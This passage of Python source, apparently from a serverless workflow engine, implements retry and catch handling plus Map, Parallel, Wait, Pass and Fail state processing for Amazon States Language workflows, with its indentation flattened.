# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
# _XXX_: need to raise the exception, so that the catcher and retryer can have a chance
raise Exception(error_type)
return function_output
#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParamters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.functionstatename + "-" + self.sandboxid
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
#CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
CounterName = str(counter_name_topic) + "-" + str(total_branch_count) + "-" + str(counter_name_key)
# prepare mapInfo metadata
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["Klist"] = klist
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
# Now provide each branch with its own input
branch = self.parsedfunctionstateinfo["Iterator"] # this is just onee set
# launch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information about state results in buckets.
# It collects these results and returns metadata and post_map_output_results
action = metadata["__state_action"]
assert action == "post_map_processing"
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = mapInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t klist:" + str(klist))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyResultPath(function_input_post_result, function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = []
if "WaitForNumBranches" in self.parsedfunctionstateinfo:
klist = self.parsedfunctionstateinfo["WaitForNumBranches"]
if not isinstance(klist, list):
self._logger.info("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
raise Exception("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
klist.sort()
for k in klist:
if not isinstance(k, int):
self._logger.info("(StateUtils) Values inside WaitForNumBranches must be integers")
raise Exception("(StateUtils) Values inside WaitForNumBranches must be integers")
if k > total_branch_count:
self._logger.info("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
raise Exception("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
else:
klist.append(total_branch_count)
counter_name_topic = self.functionstatename + "-" + self.sandboxid
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
counter_name_key = key
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_parallel_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
#CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
CounterName = str(counter_name_topic) + "-" + str(total_branch_count) + "-" + str(counter_name_key)
#CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
# prepare parallelInfo metadata
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
mapName = parentMapInfo["Name"]
mapInfoKey = mapName + "_" + key + "_map_info"
branchCounter = parentMapInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate curent index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = parallelInfo["Klist"]
NumBranchesFinished = abs(counterValue)
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
else:
post_parallel_output_values = post_parallel_output_values + [None]
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamppath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state timestamppath does not match")
#self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] Map state handling")
